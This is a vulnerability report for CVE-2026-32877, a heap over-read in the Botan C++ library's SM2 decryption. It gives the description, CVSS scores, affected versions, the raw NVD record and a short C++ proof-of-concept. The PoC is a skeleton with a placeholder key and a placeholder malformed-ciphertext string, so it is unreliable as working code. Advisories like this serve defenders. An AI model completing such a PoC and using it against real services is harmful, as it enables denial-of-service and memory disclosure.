Security Vulnerability Report
CVE-2026-32877 CVSS 8.2 HIGH

CVE-2026-32877

Published: 2026-03-30 21:17:10
Last Modified: 2026-04-13 13:57:30

Description

Botan is a C++ cryptography library. From version 2.3.0 to before version 3.11.0, during SM2 decryption, the code that checked the authentication code value (C3) failed to check that the encoded value was of the expected length prior to comparison. An invalid ciphertext can cause a heap over-read of up to 31 bytes, resulting in a crash or potentially other undefined behavior. This issue has been patched in version 3.11.0.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:botan_project:botan:*:*:*:*:*:*:*:* - VULNERABLE
Botan >= 2.3.0, < 3.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
cpp
#include <botan/data_src.h>
#include <botan/hex.h>
#include <botan/pkcs8.h>
#include <botan/pubkey.h>
#include <botan/sm2.h>
#include <botan/system_rng.h>

#include <cstdint>
#include <exception>
#include <iostream>
#include <memory>
#include <string>
#include <vector>

// PoC for CVE-2026-32877: Botan SM2 Decryption Heap Over-read
// This code attempts to decrypt a malformed ciphertext to trigger the vulnerability.
int main() {
    try {
        // Setup a valid SM2 private key (simplified for PoC context)
        // In a real scenario, this would be loaded from a PEM file
        std::string priv_key_pem = "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----";
        Botan::DataSource_Memory key_datasource(priv_key_pem);
        std::unique_ptr<Botan::Private_Key> key(Botan::PKCS8::load_key(key_datasource));

        // Malformed ciphertext designed to trigger the C3 length check failure
        // The payload must be crafted to bypass initial checks but have an invalid C3 length
        // Example structure: C1 || Invalid C3 (too short/long) || C2
        std::vector<uint8_t> malformed_ct = Botan::hex_decode("EXAMPLE_MALFORMED_HEX_STRING_HERE");

        Botan::PK_Decryptor_EME decryptor(*key, Botan::system_rng(), "Raw");

        // Trigger the heap over-read during decryption
        // This may cause a crash (Segfault) or undefined behavior
        Botan::secure_vector<uint8_t> decrypted = decryptor.decrypt(malformed_ct);
    } catch (const std::exception& e) {
        // Reaching this handler means the input was rejected with an exception;
        // a crash instead indicates the vulnerability is triggered
        std::cout << "Exception caught: " << e.what() << std::endl;
    }
    return 0;
}

References

https://github.com/randombit/botan/security/advisories/GHSA-7jj6-4r42-w9h6 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-32877",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-30T21:17:09.767",
    "lastModified": "2026-04-13T13:57:30.477",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Botan is a C++ cryptography library. From version 2.3.0 to before version 3.11.0, during SM2 decryption, the code that checked the authentication code value (C3) failed to check that the encoded value was of the expected length prior to comparison. An invalid ciphertext can cause a heap over-read of up to 31 bytes, resulting in a crash or potentially other undefined behavior. This issue has been patched in version 3.11.0."
      },
      {
        "lang": "es",
        "value": "Botan es una biblioteca de criptografía C++. Desde la versión 2.3.0 hasta antes de la versión 3.11.0, durante el descifrado SM2, el código que verificaba el valor del código de autenticación (C3) no verificó que el valor codificado tuviera la longitud esperada antes de la comparación. Un texto cifrado no válido puede causar una lectura excesiva de la pila (heap over-read) de hasta 31 bytes, lo que resulta en un fallo o potencialmente en otro comportamiento indefinido. Este problema ha sido parcheado en la versión 3.11.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-125"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:botan_project:botan:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.3.0",
                "versionEndExcluding": "3.11.0",
                "matchCriteriaId": "3275D95B-2891-4D86-B9D3-E642CFDDEED0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/randombit/botan/security/advisories/GHSA-7jj6-4r42-w9h6",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}